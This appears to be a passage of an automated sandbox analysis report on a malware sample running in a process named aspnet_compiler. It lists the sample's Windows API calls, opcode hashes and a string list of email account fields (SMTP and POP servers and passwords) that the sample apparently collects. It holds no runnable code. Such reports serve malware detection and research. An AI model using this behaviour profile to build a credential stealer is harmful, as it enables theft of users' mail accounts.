                                                  • Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                                                  • Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
                                                  • Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                                                  • Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CheckMembershipToken
                                                  • String ID:
                                                  • API String ID: 1351025785-0
                                                  • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                  • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                                  • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                  • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateDirectory
                                                  • String ID:
                                                  • API String ID: 4241100979-0
                                                  • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                  • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                                  • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                  • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CopyFileW.KERNELBASE(00000000,00000000,004041B3,00000000,F25E823B,00000000,00000000,?,004041B3,00000000,00000000,00000000), ref: 00403C3C
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CopyFile
                                                  • String ID:
                                                  • API String ID: 1304948518-0
                                                  • Opcode ID: 5c28da5d626f681fb06662006ab0c2c95d6c94e8822ad681e7d12da421b0949b
                                                  • Instruction ID: 708ff4401ac3282b12d7668d94bc51921ab55dbb6f1a62cfe087fe8b706b923f
                                                  • Opcode Fuzzy Hash: 5c28da5d626f681fb06662006ab0c2c95d6c94e8822ad681e7d12da421b0949b
                                                  • Instruction Fuzzy Hash: 57D0127200860CBFEF016EE59C05C7B3F5EEB04255B008825BD18E5021DA37DE2076E5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoNativeSystem
                                                  • String ID:
                                                  • API String ID: 1721193555-0
                                                  • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                  • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                                  • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                  • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: send
                                                  • String ID:
                                                  • API String ID: 2809346765-0
                                                  • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                  • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                                  • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                  • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileMove
                                                  • String ID:
                                                  • API String ID: 3562171763-0
                                                  • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                  • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                                  • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                  • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Startup
                                                  • String ID:
                                                  • API String ID: 724789610-0
                                                  • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                  • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                                  • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                  • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                                  • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                                  • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                                  • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                  • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                                  • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                  • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ChangeCloseFindNotification
                                                  • String ID:
                                                  • API String ID: 2591292051-0
                                                  • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                  • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                                  • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                  • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                  • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                                  • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                  • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                  • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                                  • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                  • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                  • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                                  • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                  • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                  • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                                  • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                  • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID:
                                                  • API String ID: 1174141254-0
                                                  • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                  • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                                  • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                  • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: closesocket
                                                  • String ID:
                                                  • API String ID: 2781271927-0
                                                  • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                  • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                                  • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                  • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeVirtual
                                                  • String ID:
                                                  • API String ID: 1263568516-0
                                                  • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                  • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                                  • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                  • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                  • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                                  • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                  • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                                  • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                                  • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                                  • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                                  • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                                  • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                                  • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 0040438F
                                                  • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                                  • VariantInit.OLEAUT32(?), ref: 004043C4
                                                  • SysAllocString.OLEAUT32(?), ref: 004043CD
                                                  • VariantInit.OLEAUT32(?), ref: 00404414
                                                  • SysAllocString.OLEAUT32(?), ref: 00404419
                                                  • VariantInit.OLEAUT32(?), ref: 00404431
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InitVariant$AllocString$CreateInitializeInstance
                                                  • String ID:
                                                  • API String ID: 1312198159-0
                                                  • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                  • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                                  • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                  • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                  • API String ID: 0-2111798378
                                                  • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                  • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                                  • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                  • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                  • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                                  • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                  • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%